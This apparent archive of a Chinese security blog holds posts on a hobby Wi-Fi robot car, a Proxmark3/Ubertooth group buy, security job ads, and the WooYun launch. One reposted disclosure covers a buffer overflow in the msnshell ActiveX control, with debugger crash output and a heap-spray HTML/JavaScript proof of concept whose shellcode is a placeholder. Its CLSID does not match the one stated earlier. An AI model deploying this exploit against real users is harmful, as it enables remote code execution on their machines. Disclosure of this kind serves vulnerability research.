ghostboy

鬼仔Robot（Wi-Fi小车）

鬼仔 — Fri, 20 Apr 2012 02:48:57 +0800

先上图，左边的是一代，2010年做的，右边的是二代，去年年底做的。一直想发一下，希望能够跟有相同爱好的同学做一些交流，但是拖延症太厉害了，我实在斗不过他，一直拖到现在才发。

二代跟一代比起来显得太小巧了，还是一代比较霸气。

一代是基于51单片机的，二代是基于 Arduino 的。

Wi-Fi 小车这个名字应该好理解，从名字就能看出来，就是通过 Wi-Fi 控制的小车，但是除了行驶外，添加了一些别的功能，进行了强化。其实这个想法很早就有人实现了，但是自己实现起来会更有乐趣，再加上自己从小就喜欢做手工，也比较喜欢硬件，喜欢折腾，就开始尝试自己去做了。

在一代做出来之后，发现一些问题，所以没有继续后续的加强，而是想换别的方案重新做，后来知道了 Arduino ，经过一番了解后，发现没有比它更适合做类似的东西了，而且开发起来要比单片机简单多了，在简单的学习 Arduino 之后，就开始用 Arduino 来重做小车了。感兴趣的同学可以了解下 Arduino ，这里就先不介绍了。

为了整理下发出来，把放了好久的一代也拿出来了，跟二代一起录了视频进行演示，下面会分别把视频贴出来。

一代：

演示视频：

演示视频中，能看到摄像头获取的视频不清晰，并且有时候会闪，视频不清晰是因为摄像头比较差，画面闪的问题以前是不存在的，不知道现在怎么出现了这个问题，因为一代不准备继续了，因此也就没有去查原因，只是录了视频。

主要实现的功能：
1. 小车行驶控制

通过浏览器控制小车行走，无物理线路连接，通过键盘 W、A、S、D 进行操作。

2. 摄像头视频实时查看和摄像头方向控制

小车安装有摄像头，接在路由器的 USB 口上，可将视频实时回传给控制端，在浏览器中即可看到摄像头获取到的视频，并且可以控制摄像头上下左右各180度旋转，方便查看各个方向的情况。摄像头的方向通过直接点击画面进行调整。

3. Hacking

通过小车上无线路由器中的嵌入式 Linux 可以进行一些 Hacking 行为。

4. 3G

通过在无线路由器上接入 3G 网卡，达到从公网进行控制的目的。

说明：

最初是在无意间在网上看到有人发出来的一个 Wi-Fi 小车的视频，当时看了之后就很感兴趣，于是就查找相关的信息，看到了老外以前有做过类似的东西。但是自己对单片机方面的知识是空白，可以说是白痴，很难入手。看到国内有人也在做类似的东西，就进行联系，对方做单片机的开发，做出了控制板，但是没有相应的控制程序和整体的方案，因此就基于对方做的控制板开始了摸索的过程。

ps：这个方案我后来没有继续用，也没有继续参加后续的制作，但是那个朋友还在继续完善他的方案，我不清楚现在的效果如何，因为我发现了更好的方案，所以后续没有跟进。为了避免广告的嫌疑（毕竟是要用钱买的），如果有同学对这个方案比较感兴趣的话，可以单独跟我说，我会将对方的信息发给你，然后由你自行联系。

在这个过程中借鉴了老外的思路，通过将单片机与无线路由器进行结合，达到控制小车的目的。后来陆续购买了电机、锂电池、车轮子、联轴器、舵机、铝壳等配件，这里要感谢我的老爸，帮我买铝壳，帮我用电钻打孔。

一代的主要工作流程中控制信号是这样传递的：

浏览器控制端 ---> 无线路由器 ---> 51单片机控制板 ---> 电机、舵机等

无线路由器之前比较熟悉，以前也玩过一些无线路由器，并且基于 OpenWrt 做过一些二次开发，因此这里无线路由器的 rom 我就选择了自己熟悉的 OpenWrt ，通过串口将无线路由器与控制板进行连接，在 OpenWrt 中配置了 Web 服务器与 PHP ，写了一个 Web 的控制端，这样一个 B/S 结构小车控制程序就出来了，电脑通过无线路由器的 Wi-Fi 连接到无线路由器，通过浏览器将指令传递给无线路由器，再由路由器将指令传递给控制板，通过协定好的指令来控制电机和舵机。

Web 控制端的截图：

界面写的很烂，还包括了很多调试信息，因为没有继续这个方案，所以没有对界面进行后续的美化和完善。

-----------------------------------------------------------

二代：

演示视频：

二代目前实现的功能比较简单，只是实现了行走，一样无物理线路连接。

说明：

在做二代的时候，吸取了以前的教训，不再买铝壳自己做车身了，而是在网上买了做车模的车身、电机、轮子的套装。

二代的主要工作流程中控制信号是这样传递的：

Android 控制端 ---> 蓝牙模块 ---> Arduino ---> 电机驱动器

或者

浏览器控制端 ---> Android 控制端 ---> 蓝牙模块 ---> Arduino ---> 电机驱动器

由演示视频中可以看出，二代是用手机进行控制的，手机系统是 Android ，写了一个控制小车的 App ，通过蓝牙与小车进行连接，将控制指令传递给 Arduino ，再由 Arduino 来控制电机驱动器，达到控制电机的目的。

另外在手机端的控制程序中还内置了一个 Web 服务器和 Web 的控制端，控制方式基本和一代的相同，可以将电脑与手机连接到同一 Wi-Fi 网络中，或者电脑连接手机开放的热点，或者通过 3G 访问手机提供的 Web 服务（这个我未测试），就可以通过浏览器来控制小车了。

这里跟一代区别比较大，从无线路由器转换到了手机，因为手机集成的东西更多，比如 GPS 、摄像头、陀螺仪、加速度传感器等，可以通过手机控制，也可以将手机放置在小车上，当作大脑，通过各平台的浏览器进行控制。但是手机有一个缺点，体积比较大，想控制摄像头上下左右转的话比较麻烦，而且系统没有 OpenWrt 这种嵌入式 Linux 自由。

因此后续可能还是会选择在小车上搭载一个无线路由器，因为在无线路由器中，可以做更多有意思的东西，而且现在也有了更小巧的无线路由器。

另外，一代和二代都是四驱的，没有转向轮，车子转向是通过一侧的轮子向前转，另外一侧的轮子向后转来实现的。

-----------------------------------------------------------

后续计划：

一代的方案不再继续了，还是继续二代 Arduino 的方案。平时工作比较忙，一直没有时间做后续的功能和加强，目前的计划是加上液晶屏，可以通过液晶屏传输文字给看到小车的人，添加声音的传输，跟看到小车的人进行对话，另外计划添加机械臂、GPS模块、距离传感器（超声波）、红外、温度传感器、加速器传感器、倾角传感器、声音传感器、寻线等等，并且还是以 B/S 的结构做控制，可以在浏览器中进行控制以及查看各种传感器的数据和地理位置等等，因为浏览器的通用型更强一些，适应各种平台。如果你有更好的想法，也希望能够告诉我。：）也一直想做四轴飞行器，包括航拍等，由地面扩展到空中。

至于用途，一是为了玩，二是可以有一些很邪恶的用途，看你怎么想，怎么用了。

-----------------------------------------------------------

简单的介绍和说明主要就是这些，因为时间比较长了，也一直没有整理，可能有遗漏的地方，想到后会及时更新。

欢迎有兴趣或者有相同爱好的同学跟我联系，不只局限于小车，比如 Arduino 、硬件、开源硬件、机器人电子等方面，交流想法和经验、共同学习，可以通过留言或者邮件联系我， guizaicn@gmail.com ，也可以通过微博联系我 http://weibo.com/359421 。：）

最后再放两张单独的大图：

一代：

二代：

Proxmark3 & Ubertooth-one 团购活动

鬼仔 — Wed, 23 Nov 2011 15:44:47 +0800

#鬼仔：h4k_b4n 在搞一个 Proxmark3 和 Ubertooth-one 的团购，帮他打下广告。详细信息可看：
http://radiowar.org/hardware/proxmark3-and-ubertooth-one.html

联系方式：radiowar@qq.com

团购1：
Proxmark3主要是作为RFID开发以及研究之用，是国外称之为“神器”的研究平台！
官方售价为：$229 美金
Radio团购售价为：￥1200 人民币，因设备款项较大，所以需要收取订金
Radio团购订金为：￥400 人民币
并且团购Proxmark3一台会有惊喜，不仅仅可以花费很少的钱拿到官方版的Proxmark3还可以得到另外一样与之配合使用的硬件。

团购2：
Ubertooth-one，Hak5正在出售的一个蓝牙安全设备！
设备英文介绍：

The Uberbooth One is an opensource Bluetooth test tool from Michael Ossmann. It is the world’s first affordable Bluetooth monitoring and development platform and is a fully open source product (both hardware and software).

Commercial Bluetooth monitoring equipment starts at about $10,000. Project Ubertooth seeks to produce an affordable platform that can be used for Bluetooth monitoring and for the development of new Bluetooth and wireless technologies.

Low-cost off-the-shelf Wi-Fi adapters have supported monitor mode for years, and the technique has found diverse uses in security research, troubleshooting, product development, intrusion detection, and more. Unfortunately, there has never been an equivalent tool for Bluetooth before Ubertooth One, a fully open source platform (both hardware and software).

You can find out more about Project Ubertooth on my Michael Ossmann’s blog and at the project web site.

Hak5官方售价：$119.99 美金
Radio团购售价：￥600 人民币
建议一次性购入两块设备，测试的效果以及功能因此增加！一次性团购一块的会赠送Hak5正在出售的安全设备一块，团购两块的会赠送Hak5正在出售的安全设备一块以及ubertooth-one开发设备一块。

该团购已经成行，并且接近尾声，为了方便各位赶着搭车或者不知道情况的童鞋，所以团购延长！之前团购的童鞋已经下单，货物会以第一批快递回国！

新浪招聘安全工程师（长期有效）

鬼仔 — Mon, 01 Aug 2011 16:27:18 +0800

一直在招人，这次增加了新的职位。
此信息求各种转载，：）。

联系方式（邮箱&Gtalk）：guizaicn@gmail.com
欢迎有兴趣的同学！欢迎各种简历！

工作地点：北京

安全检测工程师
职位描述：

负责公司产品和业务的安全检测和安全加固，引导开发人员修复安全问题
负责各类安全问题和安全事件的跟踪和分析，支持公司各部门日常安全工作
负责公司定期的安全风险评估和检测
负责WEB代码检查，WEB漏洞检测
突发安全事件的应急响应
跟踪和分析新的安全漏洞、安全技术

职位要求（满足以下一条或者多条均可）：

精通常见的Web漏洞类型及原理（具有丰富经验者优先考虑）
精通常见的Web漏洞防范方法与安全审计
精通渗透测试，熟练掌握各种渗透测试工具，精通常见安全攻防技术
对常见的Web编程语言要有一定的解读能力
具有一定的编程能力，熟悉至少一种编程语言
熟悉常见的应用程序漏洞、操作系统等漏洞
跟踪和分析最新安全相关的技术
具有一定的逆向分析能力和经验
具有较强的学习能力、良好的沟通能力、团队合作精神及高度的责任心

---------------------

系统安全工程师
职位描述：

服务器安全搭建和安全管理
服务器安全防护体系的设计和实施
定期进行安全审计，并协助安全事件的调查
突发安全事件的应急响应
跟踪和分析新的安全漏洞、安全技术

职位要求（满足以下一条或者多条均可）：

精通Windows和Linux的系统管理、安全管理，相关服务和应用的配置管理、安全加固，熟悉shell编程
精通渗透测试，熟练掌握各种渗透测试工具，精通常见安全攻防技术
熟悉和处理过常见系统攻击和入侵调查
熟悉常见的应用程序漏洞、操作系统等漏洞
具有一定的编程能力，熟悉至少一种编程语言
跟踪和分析最新安全相关的技术
具有较强的学习能力、良好的沟通能力、团队合作精神及高度的责任心

---------------------

安全开发工程师
职位描述：

负责公司内部安全支撑系统的开发和优化
负责公司产品安全相关的功能模块的设计与开发
把公司已有的安全工具或工作流程信息化，实现自动化操作
负责安全测试示例的编写

职位要求：

两年及以上开发或实习经验，能力突出者不受此限制
熟悉Linux系统基本操作以及Linux环境下的shell编写
熟悉PHP+MySQL开发，熟悉JavaScript、HTML、CSS，了解WEB基本原理
熟悉多种编程语言者优先，语言不限
熟悉面向对象编程，具有优良的编程风格和习惯，并会编写各种开发文档
具有强烈的责任心，较强的学习能力
具有良好的合作沟通能力和团队合作精神
熟悉Web安全，具有安全开发经验者优先

---------------------

安全运维工程师
职位描述：

负责安全设备，如防火墙、IDS、VPN等的维护和管理
突发网络安全事件的快速处理

职位要求：

熟悉常见网络安全产品（如FireWall、IDS、Scanner、Audit、IPS、VPN等）的使用
熟悉网络协议、交换机、路由器等网络设备的配置管理
熟悉和处理过常见网络攻击，如DDoS、DNS劫持等突发网络安全事件的快速处理
具有较强的学习能力、良好的沟通能力、团队合作精神及高度的责任心

安氏领信招聘安全服务工程师

鬼仔 — Mon, 04 Jul 2011 10:28:23 +0800

#鬼仔：抱歉，一直没有更新，更新了几次却都是招聘的信息。不过招聘的信息也有可能帮到大家。：）

职位：安全服务工程师

工作职责：

1. 负责对客户网络、系统进行周期性的安全评估与加固；
2. 当客户网络出现安全事故时，提供及时的响应服务；
3. 针对客户的网络架构，提出合理的网络安全解决方案；
4. 服务项目文档整理和定期报告撰写
5. 跟踪和挖掘客户需求，及时整理和上报；
6. 负责对公司SOC项目中安全运维内容的支持

职位要求：

1、能够完成各种主流系统（主机、网络、数据库等系统）的安全评估和加固；
2、有渗透测试经验，熟悉各类WEB攻击方法
3、能对客户进行网络和信息安全方面的产品、知识进行培训；
4、有系统运维或安全服务工作经验优先考虑
5、阅读大量安全读物，知识面广优先考虑

邮箱：guoqiang@linktrust.com.cn

人人网招聘安全工程师

鬼仔 — Tue, 14 Jun 2011 15:29:50 +0800

招聘人数：3
工作地点：北京
待遇：面议

岗位职责：
负责公司核心业务及产品的安全测试、安全审核、安全风险评估与分析
对产品代码进行审视，找出安全漏洞并提出修改建议
研究各种安全技术，编写和维护用于安全测试的攻击工具、防御工具和分析工具
根据公司安全的需要开发安全辅助工具或平台
维护公司现有的安全程序，系统
负责公司Web产品涉及到的安全性研究
负责响应公司的安全事件

岗位要求：
具有1年以上互联网产品的Java/PHP/C/C++开发经验
精通或熟练掌握php/perl/python/javascript/shell等多种脚本语言；
熟悉主流的Web安全技术，包括SQL注入、XSS、CSRF安全风险；
熟悉国内外主流安全产品、工具，如：AppScan扫描器、wvs等；
多年web安全工作经验，对Web安全测试有自己的理解
熟悉常见攻击和防御办法，熟悉web安全和渗透技术,能自行进行web渗透测试，恶意代码监测和分析；
有测试自动化经验者优先；
实际动手能力强，有良好的团队精神
善于学习新的知识，具有开拓创新精神

联系方式:dan.liu#renren-inc.com

新浪招聘安全工程师（长期有效）

鬼仔 — Mon, 28 Feb 2011 15:55:15 +0800

一直在招人，这次增加了新的职位。
此信息求各种转载，：）。

联系方式（邮箱&Gtalk）：guizaicn@gmail.com
欢迎有兴趣的同学！欢迎各种简历！

工作地点：北京

安全检测工程师
职位描述：

职位要求（满足以下一条或者多条均可）：

---------------------

系统安全工程师
职位描述：

职位要求（满足以下一条或者多条均可）：

---------------------

安全开发工程师
职位描述：

职位要求：

---------------------

安全运维工程师
职位描述：

负责安全设备，如防火墙、IDS、VPN等的维护和管理
突发网络安全事件的快速处理

职位要求：

淘宝招聘安全测试工程（长期有效）

鬼仔 — Mon, 24 Jan 2011 16:46:29 +0800

1、精通常见的WEB漏洞攻击方法：sql注入、xss、文件上传、文件包含、命令执行等漏洞。
2、精通常见的WEB漏洞防范方法与安全审计。
3、熟悉PHP、JAVA、javascript代码开发与安全审计；
4、熟悉linux、apache、mysql、php等安全配置与安全检查。
5、具有较强的沟通能力、团队合作能力、学习能力、文档撰写能力。
6、工作时间两年以上，应届毕业生不考虑。

工作地点：杭州

简历投递方式：
Email: woyigui#gmail.com
QQ:283088088

北京某知名IT企业招聘网络安全人员

鬼仔 — Sun, 26 Sep 2010 22:35:33 +0800

# 鬼仔：帮雨夜AD一下。不过具体是哪家公司这里没说，具体的可以问雨夜。
ps：一直没更新，比较忙，以后会慢慢恢复的。

北京大型IT集团招聘人才，主要从事安全审计和等级保护等网络安全服务。

1）项目经理一名： 3年以上从业经验，对各类安全标准、安全服务框架熟悉，可以设计体系化安全解决方案，网络与系统安全方面知识扎实，本科以上学历。具有电力行业安全实施经验者优先，CISP、CISSP 、CCIE优先。
2）VC程序UI设计师一名，要求有美术功底，熟悉VC，C#。
3）网络安全工程师2名：

熟悉windows / linux操作系统，了解补丁分发技术,并能搭建企业的多平台补丁分发平台；
熟悉防火墙、VPN、IDS、IPS等网络安全产品的原理与操作
熟悉JSP、ASP、PHP等脚本语言，对脚本和系统都要有一定程度的解读能力；
熟悉网络与系统的风险评估和安全加固
本科以上学历，CCIE CISP优先
4）渗透工程师
没有硬性要求，有自己发掘漏洞能力就可以

项目经理15-18K
工程师8-15K
渗透人员6-15K

联系方式：
QQ： 9148357
MAIL： crazitor@gmail.com

msnshell远程代码执行漏洞

鬼仔 — Sun, 19 Sep 2010 18:25:25 +0800

作者：疯狗
来源：WooYun

简要描述：
msnshell是国内一款多功能的msn辅助工具，有着方便而强大聊天加密功能，使其用户群非常广泛，但是该应用有一些已存在多年的远程代码执行漏洞。

详细说明：
问题出在msnshell的activex控件上
ClassID : 20FD1EBC-A607-4C18-9F18-0233EF4D7234
File : MSNShellSDK.dll

ShowTag以及其他部分参数对数据长度的过滤不足，当长度为540字节左右的时候造成缓冲区溢出，控制程序流程。

PS:不只是这一个参数有漏洞！

7C923297    FF75 14         push    dword ptr [ebp+14]

7C92329A    FF75 10         push    dword ptr [ebp+10]

7C92329D    FF75 0C         push    dword ptr [ebp+C]

7C9232A0    FF75 08         push    dword ptr [ebp+8]

7C9232A3    8B4D 18         mov     ecx, dword ptr [ebp+18]

7C9232A6    FFD1            call    ecx   <-- exploit it!

7C9232A8    64:8B25 0000000>mov     esp, dword ptr fs:[0]

7C9232AF    64:8F05 0000000>pop     dword ptr fs:[0]

7C9232B6    8BE5            mov     esp, ebp

7C9232B8    5D              pop     ebp

7C9232B9    C2 1400         retn    14

eax=7ffd3000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005

eip=7c92120e esp=0118ffcc ebp=0118fff4 iopl=0         nv up ei pl zr na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000246

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\W

INDOWS\system32\ntdll.dll -

ntdll!DbgBreakPoint:

7c92120e cc               int     3

0:007> g

url:ModLoad: 753b0000 75421000   C:\WINDOWS\system32\mshtmled.dll

url:ModLoad: 76320000 76367000   C:\WINDOWS\system32\comdlg32.dll

ModLoad: 76960000 76984000   C:\WINDOWS\system32\ntshrui.dll

ModLoad: 76af0000 76b01000   C:\WINDOWS\system32\ATL.DLL

ModLoad: 759d0000 75a7f000   C:\WINDOWS\system32\USERENV.dll

ModLoad: 76950000 76958000   C:\WINDOWS\system32\LINKINFO.dll

url:ModLoad: 76b10000 76b3a000   C:\WINDOWS\system32\WINMM.dll

ModLoad: 5dba0000 5dba8000   C:\WINDOWS\system32\rdpsnd.dll

ModLoad: 762d0000 762e0000   C:\WINDOWS\system32\WINSTA.dll

ModLoad: 76f20000 76f28000   C:\WINDOWS\system32\Wtsapi32.dll

ModLoad: 72c80000 72c88000   C:\WINDOWS\system32\msacm32.drv

ModLoad: 77bb0000 77bc5000   C:\WINDOWS\system32\MSACM32.dll

ModLoad: 03070000 0311f000   C:\PROGRA~1\MSNShell\BIN\MSNSHE~1.DLL

ModLoad: 5efe0000 5eff7000   C:\WINDOWS\system32\olepro32.dll

ModLoad: 75bc0000 75c3d000   C:\WINDOWS\system32\JScript.dll

Access violation - code c0000005 (first chance)

eax=41414141 ebx=41414141 ecx=00000000 edx=41414141 esi=0012dfc8 edi=00000000

eip=030746b0 esp=0012dea8 ebp=0012e0d4 iopl=0         nv up ei pl nz na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\P

ROGRA~1\MSNShell\BIN\MSNSHE~1.DLL -

MSNSHE~1+46b0:

030746b0 8b40fc           mov     eax,[eax-0x4]     ds:0023:4141413d=????????

0:000> g

Access violation - code c0000005 (first chance)

eax=00000000 ebx=00000000 ecx=41414141 edx=7c9232bc esi=00000000 edi=00000000

eip=41414141 esp=0012dad8 ebp=0012daf8 iopl=0         nv up ei pl zr na po nc

cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246

41414141 ??               ???

0:000> d eip

41414141  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

41414151  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

41414161  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

41414171  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

41414181  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

41414191  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

414141a1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

414141b1  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

0:000>

漏洞证明：
POC很简单，让程序call到0x0c0c0c0c去，使用堆喷射技术即可。

<html>

<object classid="clsid:BFB06F62-190C-42F6-91B1-3CB03560FE2D" id='target'></object>

<body>

<SCRIPT language="JavaScript">

var shellcode = unescape("you shellcode is here");

var bigblock = unescape("%u0C0C%u0C0C");

var headersize = 20;

var slackspace = headersize+shellcode.length;

while (bigblock.length<slackspace) bigblock+=bigblock;

fillblock = bigblock.substring(0, slackspace);

block = bigblock.substring(0, bigblock.length-slackspace);

while(block.length+slackspace<0x40000) block = block+block+fillblock;

memory = new Array();

for (x=0; x<350; x++) memory[x] = block +shellcode;

var buffer = '';

while (buffer.length < 540 ) buffer+='\x0C\x0C\x0C\x0C';

target.ShowTag(buffer);

</script>

</body>

</html>

修复方案：
you know.

WooYun-乌云正式上线

鬼仔 — Thu, 19 Aug 2010 18:32:35 +0800

#鬼仔：WooYun-乌云

官方网站：http://www.wooyun.org

WooYun是一个位于厂商和安全研究者之间的平台，你可以通过这个平台来接受大家报告漏洞也可以通过这个平台来报告漏洞，不同的是，所有的过程都将在WooYun上进行，你不用担心厂商像之前某些厂商所作的否认这个漏洞从而轻易否认你的努力，厂商也不用担心漏洞散落在各个Blog，论坛而导致无法及时处理导致损失，当然，这一切都是建立在尊重和荣耀这个前提。

相比漏洞的实际成因，我们更倾向于通过实际的危害来定义一个漏洞的危害和等级，所以WooYun会关注危害比较严重的譬如远程代码执行，权限提升，SQL注射之类的漏洞，一些客户端的漏洞会根据实际应用的场景和所造成的危害和影响来定义等级，譬如目前的实际环境中淘宝相对于其他厂商就比较关注 URL跳转和反射型xss漏洞。与传统的漏洞相比，我们关注服务器级别的如弱密码，不安全的服务器设置这种运维级别的问题，甚至如果有钓鱼欺诈之类对业务运营有影响的问题也可以通过平台向厂商反映。如果你能通过录像或者抓图实际证明漏洞的危害将是最好的漏洞证明方式，你可以在WooYun看到我们的漏洞分类和定义。

我们欢迎影响力大的，更重要的是注重安全的厂商在WooYun注册，同时也欢迎对漏洞研究有兴趣的白帽子来WooYun投递漏洞。为了保证WooYun的质量，目前对于厂商我们采取线下邀请的方式来注册，对于白帽子会采取投递漏洞获取邀请码的方式来注册。

我们昨天刚公布了第一批的漏洞细节，通过这些漏洞我们不只可以帮助我们分析常见的漏洞类型和原理实例，还可以更好的理解互联网安全的现状以及反思我们的安全工作本身，对于漏洞，我们有五天的确认期以给厂商时间确认漏洞的存在和一个月的保密期，厂商可以在这段较长的时间里修复自己的安全问题来避免损失。

目前WooYun完全由80sec和80sec的一些朋友利用周末时间完成，所以问题也是很多的，这里也感谢大家对各种Bug的包涵 -_-||

WooYun将按照预期持续的改进

：）

官方网站：http://www.wooyun.org
关于wooyun：http://www.wooyun.org/about.php